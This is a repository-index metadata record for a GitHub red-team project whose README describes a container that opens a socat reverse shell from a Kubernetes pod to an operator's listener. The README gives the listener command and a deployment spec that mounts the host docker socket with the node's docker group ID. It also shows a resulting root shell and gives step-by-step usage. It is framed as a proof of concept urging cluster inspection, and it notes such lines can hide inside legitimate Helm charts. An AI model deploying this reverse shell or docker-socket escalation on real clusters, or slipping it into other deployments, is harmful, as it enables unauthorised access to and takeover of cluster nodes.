{"id":13376147,"url":"https://github.com/TheSecureTux/redteam-k8spwn","last_synced_at":"2025-03-13T01:31:55.020Z","repository":{"id":164161161,"uuid":"179427716","full_name":"TheSecureTux/redteam-k8spwn","owner":"TheSecureTux","description":"Reverse shell container for k8s deployments","archived":true,"fork":false,"pushed_at":"2020-02-21T05:20:54.000Z","size":20,"stargazers_count":50,"open_issues_count":0,"forks_count":10,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-07-30T05:18:22.778Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Dockerfile","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/TheSecureTux.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-04-04T05:29:10.000Z","updated_at":"2024-07-30T05:18:22.779Z","dependencies_parsed_at":null,"dependency_job_id":"e0f948cd-9f79-417b-aaf7-b3b975645ee8","html_url":"https://github.com/TheSecureTux/redteam-k8spwn","commit_stats":null,"previous_names":["jmg87/redteam-k8spwn"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheSecureTux%2Fredteam-k8spwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheSecureTux%2Fredteam-k8spwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheSecureTux%2Fredteam-k8spwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheSecureTux%2Fredteam-k8spwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/TheSecureTux","download_url":"https://codeload.github.com/TheSecureTux/redteam-k8spwn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243322513,"owners_count":20272895,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-30T05:02:28.309Z","updated_at":"2025-03-13T01:31:55.003Z","avatar_url":"https://github.com/TheSecureTux.png","language":"Dockerfile","funding_links":[],"categories":["\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理"],"readme":"This is a proof of concept aimed to demonstrate the need to implement containter inspection, network security policies, etc. in a Kubernetes cluster. Also a reminder to always review carefully what a docker container or kubernetes deployment /helm chart is actually installing in our cluster. The few lines of code to bring up the reverse shell could be really easily mixed inbetween legitimate charts and deployments so only careful inspection would make them apparent.\n\nThis deployment launches a docker container (see Dockerfile)/ When the docker container starts it sends a reverse shell with socat to the specified addres and port. If your destination server is listening for that connection, like this, for example: \n\n        socat file:`tty`,raw,echo=0 tcp-listen:9532\n\nAt this point we have direct access to the docker. The fun part of the deal though is that the deployment also assigned the container the same security group id as the kubernetes nodes, like this:\n\n        spec:\n          securityContext:\n            fsGroup: 412    # Group ID of docker group on k8s nodes.\n          containers:\n            - name: gkpown\n              image: [repo]/redteam-gkpown\n              imagePullPolicy: Always\n              volumeMounts:\n                - name: dockersock \n                  mountPath:   \"/var/run/docker.sock\"\n          volumes:\n          - name: dockersock \n            hostPath:\n    path: /var/run/docker.sock\n\nSo we should have access to all the node context.You can check it very easily:\n    \n    tux at basecamp in ~/code/github/redteam-gkpown (master●●)\n    $  socat file:`tty`,raw,echo=0 tcp-listen:9532\n    /bin/sh: can't access tty; job control turned off\n    /gkpown # \n    /gkpown # \n    /gkpown # \n    /gkpown # \n    /gkpown # whoami\n    root\n    /gkpown # df -h\n    Filesystem                Size      Used Available Use% Mounted on\n    overlay                  25.4G     18.3G      7.0G  72% /\n    tmpfs                     6.4G         0      6.4G   0% /dev\n    tmpfs                     6.4G         0      6.4G   0% /sys/fs/cgroup\n    /dev/sda1                25.4G     18.3G      7.0G  72% /dev/termination-log\n    /dev/sda1                25.4G     18.3G      7.0G  72% /etc/resolv.conf\n    /dev/sda1                25.4G     18.3G      7.0G  72% /etc/hostname\n    /dev/sda1                25.4G     18.3G      7.0G  72% /etc/hosts\n    shm                      64.0M         0     64.0M   0% /dev/shm\n    tmpfs                     6.4G      2.0M      6.4G   0% /run/docker.sock\n    tmpfs                     6.4G     12.0K      6.4G   0% /run/secrets/kubernetes.io/serviceaccount\n    tmpfs                     6.4G         0      6.4G   0% /proc/kcore\n    tmpfs                     6.4G         0      6.4G   0% /proc/timer_list\n    tmpfs                     6.4G         0      6.4G   0% /sys/firmware\n\nHow to use this:\n\nchange the XX's in ./gkpow/socat-shell.sh for your own listener IP, build the container (docker build ), change the target image in deployment.yaml so it points to your own image and apply the deployment in the cluster (kubectl apply -f deployment.yaml)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheSecureTux%2Fredteam-k8spwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTheSecureTux%2Fredteam-k8spwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheSecureTux%2Fredteam-k8spwn/lists"}